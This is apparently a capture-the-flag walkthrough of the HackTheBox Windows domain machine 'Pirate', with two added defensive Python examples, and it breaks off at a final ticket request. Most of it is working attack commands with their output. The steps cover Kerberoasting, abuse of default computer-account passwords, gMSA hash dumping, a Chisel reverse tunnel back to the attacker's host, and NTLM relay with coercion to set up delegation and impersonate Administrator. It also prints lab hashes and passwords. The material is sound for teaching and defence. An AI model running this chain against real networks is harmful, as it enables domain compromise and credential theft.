HackTheBox - Pirate

Updated 29-03-2026

A Windows Active Directory machine that chains Pre-Windows 2000 misconfigurations, gMSA credential abuse, NTLM relay with RBCD, and SPN manipulation to pivot from a low-privileged domain account all the way to Domain Admin.

Recon

Nmap

$ ip=10.129.14.90; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-02 10:37 -0500
Nmap scan report for 10.129.14.90
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-02 22:37:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:52+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
443/tcp open https?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:53+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:52+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:52+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after: 2026-06-09T14:05:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49905/tcp open msrpc Microsoft Windows RPC
63684/tcp open msrpc Microsoft Windows RPC
63709/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-02T22:38:12
|_ start_date: N/A
|_clock-skew: mean: 6h59m42s, deviation: 0s, median: 6h59m42s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.66 seconds

The full port profile confirms this is a Domain Controller for pirate.htb (DC01.pirate.htb). Notable findings:

  • 2179/tcp — VM Remote Desktop Protocol, suggesting Hyper-V is running and there may be a guest VM on an internal network
  • 5985/tcp — WinRM available for remote management
  • 7-hour clock skew — Kerberos operations will require clock synchronization
  • SMB signing is required on DC01, ruling out NTLM relay directly against it

Foothold

Hosts File

$ echo '10.129.14.90 pirate.htb dc01.pirate.htb' | sudo tee -a /etc/hosts

SMB Enumeration

We start with credentials for pentest:p3nt3st2025!&. Enumerate accessible shares:

$ crackmapexec smb pirate.htb --shares -u pentest -p 'p3nt3st2025!&'  
SMB pirate.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB pirate.htb 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
SMB pirate.htb 445 DC01 [+] Enumerated shares
SMB pirate.htb 445 DC01 Share Permissions Remark
SMB pirate.htb 445 DC01 ----- ----------- ------
SMB pirate.htb 445 DC01 ADMIN$ Remote Admin
SMB pirate.htb 445 DC01 C$ Default share
SMB pirate.htb 445 DC01 IPC$ READ Remote IPC
SMB pirate.htb 445 DC01 NETLOGON READ Logon server share
SMB pirate.htb 445 DC01 SYSVOL READ Logon server share

Only standard shares are accessible — nothing immediately useful.

User Enumeration

Dump domain users via samrdump:

$ impacket-samrdump pirate.htb/pentest:p3nt3st2025\!\&@pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Retrieving endpoint list from pirate.htb
Found domain(s):
. PIRATE
. Builtin
[*] Looking up users in domain PIRATE
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: a.white_adm, uid = 1104
Found user: a.white, uid = 3101
Found user: pentest, uid = 4106
Found user: j.sparrow, uid = 4110
<-SNIP->

LDAP Enumeration

Query LDAP for user group memberships and Pre-Windows 2000 group members:

$ ldapsearch -x -H ldap://10.129.14.90:389 \
-D 'pentest@pirate.htb' -w 'p3nt3st2025!&' \
-b "DC=pirate,DC=htb" "(&(objectClass=user)(!(objectClass=computer)))" \
sAMAccountName memberOf -LLL

dn: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
memberOf: CN=IT,CN=Users,DC=pirate,DC=htb
sAMAccountName: a.white_adm

<--SNIP-->

dn: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=pirate,DC=htb
cn: Pre-Windows 2000 Compatible Access
member: CN=EXCH01,CN=Computers,DC=pirate,DC=htb
member: CN=MS01,CN=Computers,DC=pirate,DC=htb
member: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
member: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb

a.white_adm is a member of the IT group. EXCH01 and MS01 are listed under the Pre-Windows 2000 Compatible Access group — a strong signal they may be pre-created computer accounts still carrying their default password.

Query SPNs to identify Kerberoastable accounts:

$ ldapsearch -x -H ldap://10.129.14.90:389 \
-D 'pentest@pirate.htb' -w 'p3nt3st2025!&' \
-b "DC=pirate,DC=htb" "(&(objectClass=user)(servicePrincipalName=*))" \
sAMAccountName servicePrincipalName -LLL

<--SNIP-->

dn: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
sAMAccountName: a.white_adm
servicePrincipalName: ADFS/a.white

dn: CN=WEB01,CN=Computers,DC=pirate,DC=htb
sAMAccountName: WEB01$
servicePrincipalName: tapinego/WEB01
servicePrincipalName: tapinego/WEB01.pirate.htb
servicePrincipalName: WSMAN/WEB01
servicePrincipalName: WSMAN/WEB01.pirate.htb
servicePrincipalName: HOST/WEB01.pirate.htb
servicePrincipalName: RestrictedKrbHost/WEB01.pirate.htb
servicePrincipalName: HOST/WEB01
servicePrincipalName: RestrictedKrbHost/WEB01
servicePrincipalName: TERMSRV/WEB01.pirate.htb
servicePrincipalName: TERMSRV/WEB01
servicePrincipalName: HTTP/WEB01
servicePrincipalName: HTTP/WEB01.pirate.htb

dn: CN=gMSA_ADFS_prod,CN=Managed Service Accounts,DC=pirate,DC=htb
sAMAccountName: gMSA_ADFS_prod$
servicePrincipalName: host/adfs.pirate.htb

Key findings from the SPN query:

  • a.white_adm has ADFS/a.white — a user account with an SPN, making it a Kerberoast candidate
  • WEB01$ has HTTP/WEB01 and WSMAN/WEB01 — a computer account reachable over HTTP and WinRM
  • gMSA_ADFS_prod$ has host/adfs.pirate.htb — a Group Managed Service Account

Kerberoasting

Request the TGS hash for a.white_adm. The first attempt fails due to the clock skew flagged during Nmap:

$ impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -dc-ip 10.129.14.90 -request

<--SNIP-->
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Sync the clock and retry:

$ sudo ntpdate -u 10.129.14.90

$ impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -dc-ip 10.129.14.90 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ----------- ------------------------------- -------------------------- -------------------------- -----------
ADFS/a.white a.white_adm CN=IT,CN=Users,DC=pirate,DC=htb 2026-01-15 19:36:34.388000 2025-06-09 12:03:37.380258 constrained



[-] CCache file is not found. Skipping...
$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$956abd635f1feadf6c38d49b373733d8$<--SNIP-->

Cracking the hash with Hashcat fails, so we pivot to a different attack path.

Pre-Windows 2000 Computer Account Abuse

Computer accounts pre-created for Pre-Windows 2000 Compatible Access, like EXCH01 and MS01 above, are often still carrying their predictable default password: the computer name in lowercase without the trailing $. Use pre2k to test this:

$ git clone https://github.com/garrettfoster13/pre2k.git
$ cd pre2k
$ pipx install .

$ pre2k auth -u pentest -p p3nt3st2025\!\& -dc-ip dc01.pirate.htb -d pirate.htb

[19:09:57] INFO Retrieved 6 results total.
[19:09:57] INFO Testing started at 2026-03-02 19:09:57
[19:09:57] INFO Using 10 threads
[19:09:58] INFO VALID CREDENTIALS: pirate.htb\EXCH01$:exch01
[19:09:58] INFO VALID CREDENTIALS: pirate.htb\MS01$:ms01

Confirm using NetExec’s pre2k module, which also retrieves TGTs for the affected accounts:

$ nxc ldap pirate.htb -u pentest -p p3nt3st2025\!\& -M pre2k
LDAP 10.129.14.90 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.14.90 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
PRE2K 10.129.14.90 389 DC01 Pre-created computer account: MS01$
PRE2K 10.129.14.90 389 DC01 Pre-created computer account: EXCH01$
PRE2K 10.129.14.90 389 DC01 [+] Found 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/pirate.htb/precreated_computers.txt
PRE2K 10.129.14.90 389 DC01 [+] Successfully obtained TGT for ms01@pirate.htb
PRE2K 10.129.14.90 389 DC01 [+] Successfully obtained TGT for exch01@pirate.htb
PRE2K 10.129.14.90 389 DC01 [+] Successfully obtained TGT for 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/ccache
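
The defender-side counterpart to the two checks above, as an added example that is not code from the write-up, pre2k or NetExec: it decodes userAccountControl on exported computer objects, flags the ones that still match the pre-created pattern, and prints the equivalent LDAP filter an admin can run against the DC. It assumes the export carries sAMAccountName, userAccountControl, logonCount and memberOf; the records are constructed to resemble the hosts enumerated on this box.

```python
# Added example: audit exported computer objects for the pre-created
# (pre-Windows 2000) pattern abused above. Not part of the write-up or of pre2k.
from dataclasses import dataclass

# userAccountControl bits (documented values; only the ones this check needs)
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
UAC_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    PASSWD_NOTREQD: "PASSWD_NOTREQD",
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
}
PRE2K_GROUP_DN = "CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=pirate,DC=htb"


@dataclass(frozen=True)
class ComputerRecord:
    sam_account_name: str
    user_account_control: int
    logon_count: int
    member_of: tuple = ()


def decode_uac(uac: int) -> set:
    """Names of the known flag bits set in a userAccountControl value."""
    return {name for bit, name in UAC_NAMES.items() if uac & bit}


def looks_precreated(rec: ComputerRecord) -> bool:
    """Assumption: a pre-created account is an enabled workstation trust account
    with PASSWD_NOTREQD set (UAC 4128 is the usual value for accounts created
    with the pre-Windows 2000 option) that has never logged on (logonCount 0)."""
    uac = rec.user_account_control
    if uac & ACCOUNTDISABLE or not uac & WORKSTATION_TRUST_ACCOUNT:
        return False
    return bool(uac & PASSWD_NOTREQD) and rec.logon_count == 0


def ldap_filter() -> str:
    """Equivalent LDAP filter to run against the DC; the matching-rule OID
    1.2.840.113556.1.4.803 is the bitwise-AND test on userAccountControl."""
    return (f"(&(objectClass=computer)"
            f"(userAccountControl:1.2.840.113556.1.4.803:={PASSWD_NOTREQD})"
            f"(!(userAccountControl:1.2.840.113556.1.4.803:={ACCOUNTDISABLE}))"
            f"(logonCount=0))")


def audit(records) -> list:
    """Return (name, severity) per suspicious computer. Membership in the
    Pre-Windows 2000 Compatible Access group raises severity, since that is
    the tell the write-up used to pick its targets."""
    findings = []
    for rec in records:
        if looks_precreated(rec):
            sev = "high" if PRE2K_GROUP_DN in rec.member_of else "medium"
            findings.append((rec.sam_account_name, sev))
    return sorted(findings)


# Constructed sample shaped like the hosts enumerated on this box.
SAMPLE = [
    ComputerRecord("DC01$", SERVER_TRUST_ACCOUNT, 5120, (PRE2K_GROUP_DN,)),
    ComputerRecord("WEB01$", WORKSTATION_TRUST_ACCOUNT, 312),
    ComputerRecord("MS01$", WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD, 0, (PRE2K_GROUP_DN,)),
    ComputerRecord("EXCH01$", WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD, 0, (PRE2K_GROUP_DN,)),
    ComputerRecord("OLDPC$", WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD, 0),
    ComputerRecord("RETIRED$", WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD | ACCOUNTDISABLE, 0),
]

if __name__ == "__main__":
    for name, sev in audit(SAMPLE):
        print(f"{sev:6} {name}: reset the password or delete the object")
    print(ldap_filter())
```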

Resetting the MS01$ Password

Attempting to authenticate directly with MS01$:ms01 fails:

$ nxc smb pirate.htb -u MS01$ -p ms01                       
SMB 10.129.14.90 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.90 445 DC01 [-] pirate.htb\MS01$:ms01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT means the computer account exists but a regular NTLM logon as this workstation trust account is refused; the password itself is still accepted by the KDC, as the TGT obtained by the nxc pre2k module shows. We can set a fresh password using impacket-changepasswd, authenticating over SAMR as MS01$ itself with the known default:

$ impacket-changepasswd pirate.htb/MS01\$@pirate.htb -newpass '123' -p rpc-samr   
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Current password:
[*] Changing the password of pirate.htb\MS01$
[*] Connecting to DCE/RPC as pirate.htb\MS01$
[*] Password was changed successfully.

Verify the new credentials work:

$ nxc smb pirate.htb -u MS01$ -p 123           
SMB 10.129.14.90 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.90 445 DC01 [+] pirate.htb\MS01$:123

Dumping the gMSA Password

MS01$ is a domain computer account. Use gMSADumper to check whether it can read any gMSA password blobs — computer accounts in the right groups are often granted read access to gMSA passwords:

$ python3 gMSADumper.py -u MS01\$ -p 123 -d pirate.htb -l dc01.pirate.htb
Users or groups who can read password for gMSA_ADCS_prod$:
> Domain Secure Servers
gMSA_ADCS_prod$:::25c7f0eb586ed3a91375dbf2f6e4a3ea
gMSA_ADCS_prod$:aes256-cts-hmac-sha1-96:9914ba076bcac3bb56424c0b7d8ea8b45eb088d87fdbee3d1c6a386709e20771
gMSA_ADCS_prod$:aes128-cts-hmac-sha1-96:8e87fa0a6d2d81ff7bc5da963838e714
Users or groups who can read password for gMSA_ADFS_prod$:
> Domain Secure Servers
gMSA_ADFS_prod$:::fd9ea7ac7820dba5155bd6ed2d850c09
gMSA_ADFS_prod$:aes256-cts-hmac-sha1-96:6ccf53f00842805c75c7b314bdee5df355849093b3ef64a443c011f81f962f06
gMSA_ADFS_prod$:aes128-cts-hmac-sha1-96:fffb52ec0f49bc1eb872cfa4fa4f93ad

MS01$ can read the password for gMSA_ADFS_prod$. Verify the hash works:

$ nxc smb pirate.htb -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09
SMB 10.129.1.9 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.1.9 445 DC01 [+] pirate.htb\gMSA_ADFS_prod$:fd9ea7ac7820dba5155bd6ed2d850c09

WinRM Access as gMSA_ADFS_prod$

Log in via WinRM and enumerate the host:

$ evil-winrm -i pirate.htb -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09

ipconfig reveals a virtual Hyper-V network adapter — consistent with the 2179/tcp port seen during the Nmap scan — indicating an internal VM on 192.168.100.0/24:

*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> ipconfig

Windows IP Configuration


Ethernet adapter vEthernet (Switch01):

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
IPv4 Address. . . . . . . . . . . : 192.168.100.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 2:

Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.1.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1

Internal Network Discovery

Sweep the internal 192.168.100.0/24 subnet for live hosts:

*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents>     1..255 | % { $ip="192.168.100.$_"; if (Test-NetConnection $ip -InformationLevel Quiet -WarningAction SilentlyContinue -ErrorAction SilentlyContinue) {$ip} }
192.168.100.1
192.168.100.2

192.168.100.2 is a live VM. Set up a Chisel SOCKS5 tunnel to reach it from the attack machine.

Tunnelling with Chisel

Start the Chisel server on the attack machine:

$ chisel server -p 8080 --reverse

Upload chisel.exe to the target and connect back:

*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> upload chisel.exe

Info: Uploading /home/kali/tools/chisel.exe to C:\Users\gMSA_ADFS_prod$\Documents\chisel.exe

Data: 14149632 bytes of 14149632 bytes copied
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> .\chisel client 10.10.16.27:8080 R:socks
chisel.exe : 2026/03/06 09:49:13 client: Connecting to ws://10.10.16.27:8080
+ CategoryInfo : NotSpecified: (2026/03/06 09:4...0.10.16.27:8080:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2026/03/06 09:49:15 client: Connected (Latency 113.2576ms)

Port Scanning the VM

Scan common ports on 192.168.100.2 through the SOCKS5 tunnel:

$ sudo proxychains4 -q -f /etc/proxychains4-1.conf nmap -p21,22,53,80,88,135,139,389,443,445,3389,5985 -sT -Pn 192.168.100.2
[sudo] password for kali:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-06 05:50 -0500
Nmap scan report for 192.168.100.2
Host is up (0.00s latency).

PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
53/tcp closed domain
80/tcp open http
88/tcp closed kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp closed ldap
443/tcp open https
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 97.08 seconds

WinRM is open on the VM. The gMSA_ADFS_prod$ hash works here too:

$ sudo proxychains4 -q -f /etc/proxychains4-1.conf evil-winrm -i 192.168.100.2 -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents>

The VM is WEB01:

*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> whoami
pirate\gmsa_adfs_prod$
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> hostname
WEB01

The user a.white has a home directory on WEB01, but we can’t access it yet:

*Evil-WinRM* PS C:\Users> ls


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/15/2026 7:37 PM a.white
d----- 6/9/2025 10:11 AM Administrator
d----- 6/9/2025 6:55 AM Administrator.PIRATE
d----- 6/9/2025 7:31 AM gMSA_ADFS_prod$
d----- 1/15/2026 6:40 PM gMSA_ADFS_prod$.PIRATE
d-r--- 6/8/2025 1:29 PM Public

NTLM Relay with RBCD against WEB01

An nxc scan confirms that WEB01 has SMB signing disabled — making it a valid NTLM relay target:

$ proxychains4 -q -f /etc/proxychains4-1.conf nxc smb 192.168.100.2 -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB 192.168.100.2 445 WEB01 [+] pirate.htb\gMSA_ADFS_prod$:fd9ea7ac7820dba5155bd6ed2d850c09

Start ntlmrelayx targeting LDAPS on the DC with --delegate-access. This will automatically create a new machine account and configure Resource-Based Constrained Delegation (RBCD) on WEB01$, granting the new account the right to impersonate any user on WEB01:

$ impacket-ntlmrelayx -t ldaps://pirate.htb --delegate-access --remove-mic -smb2support
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled

[*] Servers started, waiting for connections

In a second terminal, use coercer to force WEB01 to authenticate to our machine via MS-RPRN (PrinterBug) or similar RPC methods, triggering the relay:

$ sudo proxychains4 -q -f /etc/proxychains4-1.conf coercer coerce -l 10.10.16.27 -t 192.168.100.2 -d pirate.htb -u 'gMSA_ADFS_prod$' --hashes :fd9ea7ac7820dba5155bd6ed2d850c09 --always-continue

<--SNIP-->

[+] SMB named pipe '\PIPE\spoolss' is accessible!
[+] Successful bind to interface (12345678-1234-abcd-ef00-0123456789ab, 1.0)!
[!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.16.27\x00')
[>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.16.27\x00') [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.16.27\x00')
[+] All done! Bye Bye!

ntlmrelayx receives the relayed authentication and creates a new machine account ISDEFLNY$ with RBCD configured on WEB01$:

<--SNIP-->

[*] (SMB): Connection from 10.129.1.9 controlled, but there are no more targets left!
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> Adding new computer with username: ISDEFLNY$ and password: M^oQ*tW,e,TuV}$ result: OK
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> Delegation rights modified succesfully!
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> ISDEFLNY$ can now impersonate users on WEB01$ via S4U2Proxy
[*] All targets processed!
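
What this chain leaves in the DC's Security log, as an added detection example (not code from the write-up, ntlmrelayx or coercer): a computer-account creation (event 4741) by a machine account, immediately followed by a write to msDS-AllowedToActOnBehalfOfOtherIdentity (event 5136) on the writer's own computer object. It assumes events have already been parsed into flat dicts with the field names shown, that the Directory Service Changes audit subcategory and an object SACL are in place for 5136 to fire, and the sample events are constructed to mirror WEB01$ creating ISDEFLNY$ above.

```python
# Added example: correlate DC Security-log events for the relay -> RBCD chain
# shown above. Not part of the write-up or of the tools it uses.
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(minutes=10)   # assumption: creation and RBCD write land close together


def first_cn(dn: str) -> str:
    """'CN=WEB01,CN=Computers,DC=pirate,DC=htb' -> 'WEB01'."""
    rdn = dn.split(",", 1)[0]
    return rdn.split("=", 1)[1] if "=" in rdn else rdn


def is_machine(name: str) -> bool:
    return name.endswith("$")


def detect_rbcd_chain(events) -> list:
    """Return (rule, subject, detail) findings. Assumed flat schema: 'time'
    (ISO 8601), 'EventID', 'SubjectUserName'; 'TargetUserName' on 4741;
    'ObjectDN' and 'AttributeLDAPDisplayName' on 5136."""
    findings = []
    creations = []   # (time, creator, new_account) seen so far
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        subj = ev.get("SubjectUserName", "")
        if ev["EventID"] == 4741:
            creations.append((t, subj, ev["TargetUserName"]))
            if is_machine(subj):
                # a computer account created another computer account
                # (MachineAccountQuota spent by something that is not an admin)
                findings.append(("machine-creates-machine", subj, ev["TargetUserName"]))
        elif ev["EventID"] == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            target = first_cn(ev["ObjectDN"])
            if is_machine(subj) and subj.rstrip("$").lower() == target.lower():
                # the host wrote RBCD onto its own object: the relay signature
                findings.append(("self-rbcd-write", subj, ev["ObjectDN"]))
            for ct, creator, new_acct in creations:
                if creator == subj and t - ct <= WINDOW:
                    findings.append(("create-then-rbcd", subj, f"{new_acct} -> {target}"))
    return findings


# Constructed sample mirroring the relay above: WEB01$ creates ISDEFLNY$ and
# one second later writes RBCD onto WEB01; the other events are unrelated.
SAMPLE_EVENTS = [
    {"time": "2026-03-06T09:49:13", "EventID": 4624, "SubjectUserName": "a.white"},
    {"time": "2026-03-06T09:58:01", "EventID": 4741, "SubjectUserName": "WEB01$",
     "TargetUserName": "ISDEFLNY$"},
    {"time": "2026-03-06T09:58:02", "EventID": 5136, "SubjectUserName": "WEB01$",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=pirate,DC=htb",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"time": "2026-03-06T11:30:00", "EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=FS01,CN=Computers,DC=pirate,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName"},
]

if __name__ == "__main__":
    for rule, subject, detail in detect_rbcd_chain(SAMPLE_EVENTS):
        print(f"[{rule}] {subject}: {detail}")
```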

<--SNIP-->

Obtaining a Service Ticket for WEB01

Use getST with S4U2Proxy to impersonate Administrator on WEB01. The first attempt fails on clock skew, and the second on an unknown SPN — SPNs are registered under hostnames, not IPs:

$ impacket-getST -spn 'cifs/192.168.100.2' -impersonate 'Administrator' 'pirate.htb/ISDEFLNY$:M^oQ*tW,e,TuV}$' -dc-ip pirate.htb 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

$ sudo ntpdate -u pirate.htb
[sudo] password for kali:
2026-03-06 13:29:18.515434 (-0500) +25173.789906 +/- 0.054373 pirate.htb 10.129.1.9 s1 no-leap
CLOCK: time stepped by 25173.789906

$ impacket-getST -spn 'cifs/192.168.100.2' -impersonate 'Administrator' 'pirate.htb/ISDEFLNY$:M^oQ*tW,e,TuV}$' -dc-ip pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Probably user ISDEFLNY$ does not have constrained delegation permisions or impersonated user does not exist

Add WEB01's hostname to /etc/hosts and retry with the FQDN:

$ echo '192.168.100.2 web01.pirate.htb' | sudo tee -a /etc/hosts

$ impacket-getST -spn 'cifs/web01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/ISDEFLNY$:M^oQ*tW,e,TuV}$' -dc-ip pirate.htb
